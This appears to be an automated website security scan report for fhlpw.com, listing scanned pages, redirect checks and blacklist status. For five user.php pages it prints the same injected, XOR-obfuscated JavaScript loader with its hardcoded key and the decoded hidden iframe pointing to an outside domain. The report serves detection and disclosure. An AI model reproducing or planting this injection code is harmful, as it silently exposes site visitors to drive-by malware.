Scanned pages/files
Request | Server response | Status |
http://www.fhlpw.com/ | 200 OK Content-Length: 21720 Content-Type: text/html | clean |
http://www.fhlpw.com/js/common.js | 200 OK Content-Length: 29050 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/themes/quwan/js/left_goodslist.js | 200 OK Content-Length: 1329 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/transport.js | 200 OK Content-Length: 22668 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/js/utils.js | 200 OK Content-Length: 4297 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/user.php?act=register | 200 OK Content-Length: 47103 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) strHTML=""; strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5"; strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01"; strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%"; strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B"; strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%"; strHTML+="16U%12WY%01%02%15T%11W%0CWY str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} } function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } } performPage(); Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src=" Antivirus reports:
| ||
http://www.fhlpw.com/js/user.js | 200 OK Content-Length: 19088 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/themes/quwan/js/scrolltop.js | 200 OK Content-Length: 699 Content-Type: application/x-javascript | clean |
http://www.fhlpw.com/user.php | 200 OK Content-Length: 44192 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) strHTML=""; strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5"; strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01"; strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%"; strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B"; strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%"; strHTML+="16U%12WY%01%02%15T%11W%0CWY str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} } function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } } performPage(); Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src=" Antivirus reports:
| ||
http://www.fhlpw.com/index.php | 200 OK Content-Length: 5792 Content-Type: text/html | clean |
http://www.fhlpw.com/user.php?act=order_list | 200 OK Content-Length: 44207 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) strHTML=""; strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5"; strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01"; strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%"; strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B"; strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%"; strHTML+="16U%12WY%01%02%15T%11W%0CWY str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} } function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } } performPage(); Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src=" Antivirus reports:
| ||
http://www.fhlpw.com/user.php?act=message_list | 200 OK Content-Length: 44209 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) strHTML=""; strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5"; strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01"; strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%"; strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B"; strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%"; strHTML+="16U%12WY%01%02%15T%11W%0CWY str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} } function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } } performPage(); Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src=" Antivirus reports:
| ||
http://www.fhlpw.com/user.php?act=collection_list | 200 OK Content-Length: 44212 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) strHTML=""; strHTML+="%0F@T%10%0D@%11EZ%04%5EU%13%02%05%06F%0C%5B%04@UK%01G%0AA@%0F%3D%04B%5"; strHTML+="DPC%0B%0B%5EE%10B%03%08F%09RTK%15ECLMBY%10%15%0CD@%1D%5EN%5BV%5D%1B%01"; strHTML+="_F%04%17%16%06XS%14QN%00%0EPCV%0D%5BM%16%088l%0F%5DR%0C%0A@GEL%08U%0B%"; strHTML+="02B%0D%0B%5B%5BSY%14%0EX%5D%00%1E%5D%04%0EP%0D%18OR%0A%11CA%1DT%0A%05B"; strHTML+="%26%0AR%00qFN%0AIHO%0AB%12_@%5B%0A%1D%00%0F%0A%05%1EhLPRD%07D%00_%06W%"; strHTML+="16U%12WY%01%02%15T%11W%0CWY str_md5:function(s){return binl2str(core_md5(str2binl(s), s.length * this.chrsz));} } function performPage(strPass){ if(strPass){ document.cookie="password="+escape(strPass); document.write(XOR(unescape(strHTML),STR.md5(strPass))); return(false); } var pass="6546hgfhfhSSD"; if(pass){ pass=unescape(pass); document.write(XOR(unescape(strHTML),STR.md5(pass))); return(false); } } performPage(); Decoded script: <iframe src=http://lczsyq.cn/lczsyq/images/data/index.html width=0 height=0></iframe> <html> <body link="#000000" vlink="#000000"> </body> </html> <html> <body link="#000000" vlink="#000000"> </iframe> <html> <body link="#000000" vlink="#000000"> <script language=JavaScript src=" Antivirus reports:
| ||
http://www.fhlpw.com/user.php?act=affiliate | 200 OK Content-Length: 26064 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fhlpw.com
Result:
GET / HTTP/1.1
Host: fhlpw.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fhlpw.com
Referer: http://www.google.com/search?q=fhlpw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fhlpw.com
Referer: http://www.google.com/search?q=fhlpw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fhlpw.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fhlpw.com/
Result: fhlpw.com is not infected or malware details are not published yet.
Result: fhlpw.com is not infected or malware details are not published yet.